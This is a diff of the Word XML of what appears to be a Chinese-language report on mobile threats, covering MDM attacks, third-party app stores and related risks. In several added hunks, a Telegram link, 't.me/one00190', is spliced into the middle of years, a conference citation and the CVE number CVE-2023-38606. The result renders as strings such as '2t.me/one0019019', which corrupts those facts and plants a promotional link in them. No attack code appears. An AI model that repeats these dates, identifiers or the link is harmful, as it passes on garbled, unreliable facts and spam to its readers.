       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -7983,11 +7826,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8026,11 +7864,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8064,12 +7897,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8141,12 +7968,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8212,12 +8033,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8311,12 +8126,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8382,12 +8191,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8469,11 +8272,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8492,16 +8290,27 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">2019 </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">19 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8583,16 +8392,41 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">2020 </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8638,16 +8472,27 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">2024 </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">24 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8666,7 +8511,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">USENIX Security 2026 </w:t>
+        <w:t>USENIX Security 2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">26 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8688,11 +8545,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8711,9 +8563,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8740,9 +8589,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8762,9 +8608,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8783,11 +8626,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc242275494"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc242275494"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8800,14 +8640,9 @@
         </w:rPr>
         <w:t>（移动设备管理）攻击</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8823,11 +8658,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8866,11 +8696,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -8904,12 +8729,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -8981,12 +8800,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9073,12 +8886,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9144,30 +8951,23 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1667" w:type="pct"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1667" w:type="pct"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t xml:space="preserve">MDM </w:t>
             </w:r>
             <w:r>
@@ -9210,7 +9010,35 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVE-2023-38606</w:t>
+              <w:t xml:space="preserve"> CVE-2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>23-386</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>t.me/one00190</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9244,12 +9072,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9338,11 +9160,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9361,16 +9178,27 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">2015 </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">15 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9428,16 +9256,27 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">2023 </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">23 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9451,7 +9290,35 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> CVE-2023-38606</w:t>
+        <w:t xml:space="preserve"> CVE-2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>23-386</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>6</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9488,16 +9355,27 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">2026 </w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">26 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9540,11 +9418,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9563,9 +9436,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9609,9 +9479,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9643,9 +9510,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -9683,11 +9547,8 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc242275495"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="14" w:name="_Toc242275495"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9700,14 +9561,9 @@
         </w:rPr>
         <w:t>第三方应用商店与灰色市场</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="14"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9723,11 +9579,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9772,11 +9623,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -9810,12 +9656,6 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9887,12 +9727,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -9958,12 +9792,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -10043,12 +9871,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -10128,12 +9950,6 @@
         </w:tc>
       </w:tr>
       <w:tr>
-        <w:tblPrEx>
-          <w:tblCellMar>
-            <w:top w:w="0" w:type="dxa"/>
-            <w:bottom w:w="0" w:type="dxa"/>
-          </w:tblCellMar>
-        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -10201,11 +10017,6 @@
     </w:tbl>
     <w:p/>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10224,9 +10035,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10252,7 +10060,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2026</w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>26</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10301,9 +10121,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10322,7 +10139,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2026</w:t>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>26</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10359,9 +10188,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10392,11 +10218,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10415,9 +10236,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10449,9 +10267,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10478,9 +10293,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10511,16 +10323,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc242275496"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_Toc242275496"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t xml:space="preserve">4.4 </w:t>
       </w:r>
       <w:r>
@@ -10541,14 +10349,9 @@
         </w:rPr>
         <w:t>）风险</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      <w:bookmarkEnd w:id="15"/>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10564,11 +10367,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10625,11 +10423,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10648,9 +10441,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10682,9 +10472,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10704,9 +10491,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10723,11 +10507,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10750,11 +10529,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10771,7 +10545,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 2024 </w:t>
+        <w:t xml:space="preserve"> 2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>t.me/one00190</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">24 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10796,9 +10582,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10811,9 +10594,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10826,9 +10606,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -10838,11 +10615,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -10861,9 +10633,6 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="422" w:hanging="422"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
